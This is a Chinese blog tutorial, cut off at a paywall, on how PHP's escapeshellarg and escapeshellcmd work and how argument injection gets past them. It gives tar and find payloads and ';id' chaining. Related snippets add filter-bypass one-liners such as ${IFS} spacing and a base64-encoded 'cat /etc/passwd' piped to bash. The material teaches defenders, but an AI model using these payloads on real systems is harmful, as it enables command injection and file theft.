利用/绕过escapeshellarg/escapeshellcmd函数

最新推荐文章于 2023-12-14 10:28:47 发布
原创 最新推荐文章于 2023-12-14 10:28:47 发布 · 6.6k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#escapeshellarg #escapeshellcmd #php #web安全

本文详细介绍了PHP的escapeshellarg和escapeshellcmd函数,用于防止命令注入攻击。然而,文章揭示了这些函数的局限性和可能的绕过方法,包括通过参数注入在TAR、FIND、SENDMAIL、CURL、MYSQL、UNZIP等命令中执行恶意操作。同时,文章提到了一些经典漏洞利用示例和GitList RCE漏洞的利用方式,强调了设置LANG环境变量的重要性。此外,还给出了如何利用这些漏洞执行命令的例子,以及如何通过限制参数来增强安全性。

利用/绕过escapeshellarg/escapeshellcmd

[1]escapeshellarg和escapeshellcmd的功能

escapeshellarg:
(PHP 4 >= 4.0.3, PHP 5, PHP 7)
把字符串转码为可以在 shell 命令里使用的参数
string escapeshellarg ( string $arg )
escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符
概述:
1.确保用户只传递一个参数给命令
2.用户不能指定更多的参数一个
3.用户不能执行不同的命令

escapeshellcmd:
(PHP 4, PHP 5, PHP 7)
shell 元字符转义
string escapeshellcmd ( string $command )
escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义;反斜线(\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$, \x0A 和 \xFF;’ 和 " 仅在不配对儿的时候被转义;在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替
概述:
1.确保用户只执行一个命令
2.用户可以指定不限数量的参数
3.用户不能执行不同的命令

用groups去打印组里每个username成员

<?php
	$username = 'h3rmesk1t';
	system('groups '.$username);
?>

=> 
h3rmesk1t : h3rmesk1t adm cdrom sudo dip plugdev lpadmin lxd sambashare

但是攻击者可以在username里使用;或者||
在Linux里,这意味着第二个命令可以在第一个之后被执行

<?php
	$username = 'h3rmesk1t;id';
	system('groups '.$username);
?>

=> 
h3rmesk1t : h3rmesk1t adm cdrom sudo dip plugdev lpadmin lxd sambashare
uid=0(root) gid=0(root) groups=0(root)

为了防止这一点,我们使用escapeshellcmd
现在攻击者不能允许第2个命令了

<?php
	$username = 'h3rmesk1t;id';
	system(escapeshellcmd('groups '.$username));
?>

=>
groups: ‘h3rmesk1t;id’: no such user

这是因为php内部运行了下列命令,以至于myuser;id被当成了一个字符串

$ groups myuser;id
groups: „myuser;id”: no such user

但是在这种方法中,攻击者可以指定更多参数groups
例如,一次检测多个用户

<?php
	$username = 'h3rmesk1t root';
	system(escapeshellcmd('groups '.$username));
?>

=>
h3rmesk1t : h3rmesk1t adm cdrom sudo dip plugdev lpadmin lxd sambashare
root : root

假设我们希望允许每个脚本执行仅检查一个用户

<?php
	$username = 'h3rmesk1t root';
	system('groups '.escapeshellarg($username));
?>

=> 
groups: ‘h3rmesk1t root’: no such user

这是因为现在$username被视为单个参数:

$ groups 'myuser1 myuser2'
groups: "myuser1 myuser2": no such user

[2]已知的绕过/利用

参数注入

从上一章可以看到,使用escapeshellcmd / escapeshellarg时不可能执行第二个命令
但是我们仍然可以将参数传递给第一个命令
这意味着我们也可以将新选项传递给命令
利用漏洞的能力取决于目标可执行文件
可以在下面找到一些已知可执行文件的列表,其中包含一些可能被滥用的特定选项

TAR

压缩some_file到/tmp/sth

$command = '-cf /tmp/sth /some_file';
system(escapeshellcmd('tar '.$command));

创建一个空文件/tmp/exploit

$command = "--use-compress-program='touch /tmp/exploit' -cf /tmp/passwd /etc/passwd";
system(escapeshellcmd('tar '.$command));

FIND

在/Desktop目录下查找1.php

<?php
	$command = '1.php';
	system('find ~/Desktop/ -iname '.escapeshellcmd($command));
?>

=> 
/root/Desktop/1.php

打印/etc/passwd内容

<?php
	$file = "sth -or -exec cat /etc/passwd ; -quit";
	system("find /tmp -iname ".escapeshellcmd($file));
?>

=>
root:x:0:0:root
最低0.47元/天 解锁文章
浅谈CTF中escapeshellarg利用
读万卷书,行万里路。
08-09 6028
浅谈 escapeshellarg利用 文章目录浅谈 escapeshellarg利用0 前言1 参数注入2 逃逸字符2.1 cat flag2.2 freepoint3 总结 0 前言 escapeshellarg 的作用是把字符串转码为可以在 shell 命令里使用的参数。(escapeshellargescapeshellcmd 相似,主要看是否有引号) 在 CTF 可能被用于: 参数注入(开发人员错误的使用 escapeshellarg 函数) 逃逸字符(该函数非二进制安全) 1
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
东隅的博客
09-12 935
PHP escapeshellarg()+escapeshellcmd() 导致的漏洞
php escapeshellcmd,利用/绕过 PHP escapeshellarg/escapeshellcmd函数
weixin_42138703的博客
03-11 2748
escapeshellargescapeshellcmd的功能escapeshellarg1.确保用户只传递一个参数给命令2.用户不能指定更多的参数一个3.用户不能执行不同的命令escapeshellcmd1.确保用户只执行一个命令2.用户可以指定不限数量的参数3.用户不能执行不同的命令让我们用groups去打印组里每个username成员$username = 'myuser';system(...
PHP escapeshellarg()+escapeshellcmd()绕过
rev1ve的博客
12-08 4307
这样的流程来处理输入是存在隐患的,mail就是个很好的例子,因为它函数内部使用了escapeshellcmd,如果开发人员仅用escapeshellarg来处理输入再传给mail那这层防御几乎是可以忽略的。如果可以注入参数,那利用就是各种各样的了,例如 PHPMailer 和 RoundCube 中的mail和 Naigos Core 中的 curl都是很好的参数注入的例子。当进行escapeshellarg()函数处理后,会先进行字符转义,变成如下。那么我们在传入参数的前面添加单引号,后面空格加单引号。
PHP - 函数绕过 - escapeshell[arg|cmd]()
3569
11-30 3125
https://www.anquanke.com/post/id/107336 发现有时候,只有用到相关东西(有需求),才会发现,哎呀,写的真好。 escapeshellarg 1.确保用户只传递一个参数给命令 2.用户不能指定更多的参数一个 3.用户不能执行不同的命令 escapeshellcmd 1.确保用户只执行一个命令 2.用户可以指定不限数量的参数 3.用户不能执行不同的...
escapeshellargescapeshellcmd 绕过之[BUUCTF 2018]Online Tool
qq_58970968的博客
07-09 1626
知识点:escapeshellargescapeshellcmd 绕过nmap -oG 参数,将结果和命令写入到文件详细:参考谈谈escapeshellarg参数绕过和注入的问题escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)我的理解
escapeshellarg绕过与参数注入漏洞
Galaxy_0的博客
02-15 410
escapeshellarg绕过与参数注入漏洞
[红日安全]代码审计Day5 - escapeshellargescapeshellcmd使用不当
hongrisec的博客
03-31 1169
点击订阅我们    和红日一起成长 让安全如此精彩   红日安全出品|转载请注明来源 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!(来源:红日安全) 本文由红日安全成员: l1nk3r...
BUUCTF 2018 Online Tool(escapeshellargescapeshellcmd使用不当导致rce)
qq_45521281的博客
05-20 1400
参考: 谈谈escapeshellarg参数绕过和注入的问题 PHP escapeshellarg()和escapeshellcmd()并用之殇 谈escapeshellarg绕过与参数注入漏洞 https://blog.csdn.net/qq_26406447/article/details/100711933 进入题目显示php源码: 这里用到escapeshellarg()、escapeshellcmd()两个函数escapeshellargescapeshellarg() 将给字符串增加一
escapeshellarg参数绕过和注入的问题
m0_75178803的博客
12-14 2856
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回。用空格替换了百分号、感叹号(延迟变量替换)和双引号,并在字符串两边加上双引号。在windows系统中,system函数直接在控制台调用一个command命令。参数,命令执行后的返回状态会被写入到此变量。参数, 那么会用命令执行的输出填充此数组。)都会被一个额外的反斜线所转义。
php escapeshellcmd
刘阳龙Herman的专栏
09-14 1839
<br />除去字符串中的特殊符号。 <br />语法:string escapeshellcmd(string command);<br />返回值: 字符串 <br />函数种类: 操作系统与环境 <br /> <br /> 内容说明<br />本函数除去了字符串中的特殊符号,可以防止使用者耍花招来破解该服务器系统。可以用本函数搭配 exec() 或是 system() 二个函数,酱子可以减少网络上的使用者恶意的破晃募机会。 <br /> <br /> 使用范例<br /><?php<br />sys
escapeshellarg escapeshellcmd漏洞
a3320315的博客
01-31 1483
[BUUCTF 2018]Online [BUUCTF 2018]Online 谈escapeshellarg绕过与参数注入漏洞 命令参数注入
php escapeshellcmd,PHP escapeshellarg()+escapeshellcmd() 之殇
weixin_36368404的博客
03-11 519
Author: Hcamael, p0wd3r (知道创宇404安全实验室)Date: 2016-12-280x00 简介前两天爆出了 PHPMailer 小于 5.2.18 版本的 RCE 漏洞,官方在补丁中使用了escapeshellarg来防止注入参数,但有趣的是经过测试我们发现该补丁是可以被绕过的,并且攻击面可以延伸到更大而不仅仅是局限于这个应用。0x01 漏洞复现环境搭建Dockerfi...
php escapeshellcmd,从escapeshellcmd bypass说起到宽字节注入
weixin_42500195的博客
03-11 661
1 php 多字节绕过escapeshellcmdescapeshellcmd()对shell元字符过滤加反斜杠;反斜线(\)会在以下字符之前插入: #&;`|*?~<>^()[]{}$, \x0A 和 \xFF,但在php5.2.5及之前存在通过输入多字节绕过escapeshellcmd的问题。5.2.6 已经修复了该问题。执行 escapeshellcmd("echo "....
PHP内核』PHP 7 escapeshellcmd底层探究
Ho1aAs‘s Blog
10-19 1459
文章目录escapeshellcmd描述勘误静态调试PHP_FUNCTION(escapeshellcmd)PHPAPI zend_string *php_escape_shell_cmd(char *str)跳过多字节字符对有效字符转义检查结果有效性并返回动态调试常规输入输入多字节字符完 escapeshellcmd描述 escapeshellcmd归于程序执行类函数,对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 escapeshellcmd(string $command): st
一天一道ctf 第20天(escapeshellargescapeshellcmd
scrawman的博客
04-07 990
[强网杯 2019]高明的黑客 作者直接告诉我们源码备份在www.tar.gz,这样就不用扫网站目录了,省了不少时间。 靠当我没有说,这里面几千个文件,怪不得43M。那人工代码审计是不可能的了,只能靠跑脚本。这里观摩了一下网上大神写的脚本: https://blog.csdn.net/a3320315/article/details/102945940 主要是看一下脚本的思路,等以后有能力了再做一遍。 ...
escapeshellargescapeshellcmd使用不当
qq_37466661的博客
08-20 346
php代码审计 escapeshellargescapeshellcmd使用不当
5.4 命令执行绕过:核心围绕 “如何突破命令执行中的过滤限制” 展开,包括空格过滤绕过(如 $IFS、 等替代方式)和关键字过滤绕过(如变量拼接、通配符、编码等方法),通过典型案例解析不同绕过策略的原理与适用场景。 5.5 命令执行漏洞修复:聚焦 “如何从根源上防范命令执行漏洞”,重点讲解两类核心措施:一是通过 PHP 配置禁用敏感函数(如 system、exec 等);二是使用专业过滤函数(如 escapeshellargescapeshellcmd)对用户输入进行处理,结合代码示例说明修复逻辑
最新发布
08-21
命令执行绕过技术是一种在渗透测试和漏洞利用中常被讨论的技术,特别是在存在命令执行漏洞的情况下,攻击者可能会尝试绕过系统对命令执行的限制。以下是几种常见的绕过方法和修复策略: ### 空格过滤的绕过方法 在某些情况下,系统可能过滤了空格字符,以防止执行多个命令。攻击者可以使用其他字符替代空格来绕过这种限制。例如,可以使用 `${IFS}`(内部字段分隔符)来替代空格: ```bash cat${IFS}/etc/passwd ``` ### 关键字过滤的绕过方法 如果系统过滤了特定的关键字,如 `cat` 或 `ls`,攻击者可能会尝试使用其他命令或编码方式来绕过。例如,使用 `nl` 命令来读取文件内容,或者使用 base64 编码来混淆命令: ```bash echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash ``` ### 变量拼接 通过将命令拆分为多个变量,然后拼接执行,可以绕过简单的关键字过滤机制。例如: ```bash a=ca b=t $a$b /etc/passwd ``` ### 通配符编码 使用通配符或特殊字符来代替具体的文件名或命令,以绕过过滤。例如,使用 `*` 来匹配文件名: ```bash cat /*/passwd ``` ### bypass command execution restrictions 在某些环境中,可能对命令执行进行了严格的限制。攻击者可能会尝试使用脚本语言(如 Perl 或 Python)来绕过这些限制,因为这些语言本身提供了执行系统命令的功能: ```bash perl -e 'system("cat /etc/passwd");' ``` ### 命令执行漏洞修复方法 为了防止命令执行漏洞,应采取以下措施: 1. **避免直接使用用户输入**:不要直接将用户输入用于命令执行,而是使用安全的API或函数。 2. **输入验证**:对所有用户输入进行严格的验证,确保输入符合预期格式。 3. **使用安全函数**:在PHP中,可以使用 `escapeshellarg()` 和 `escapeshellcmd()` 函数来转义命令参数和命令本身,防止注入攻击。 ### PHP禁用敏感函数PHP中,可以通过 `php.ini` 文件禁用可能带来风险的函数,如 `exec`、`shell_exec`、`system` 等: ```ini disable_functions = exec,shell_exec,system,passthru ``` 通过上述方法,可以有效地绕过或修复命令执行相关的安全限制和漏洞。然而,重要的是要强调这些技术仅应用于合法的渗透测试和安全研究中,未经授权的攻击和测试是非法的。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值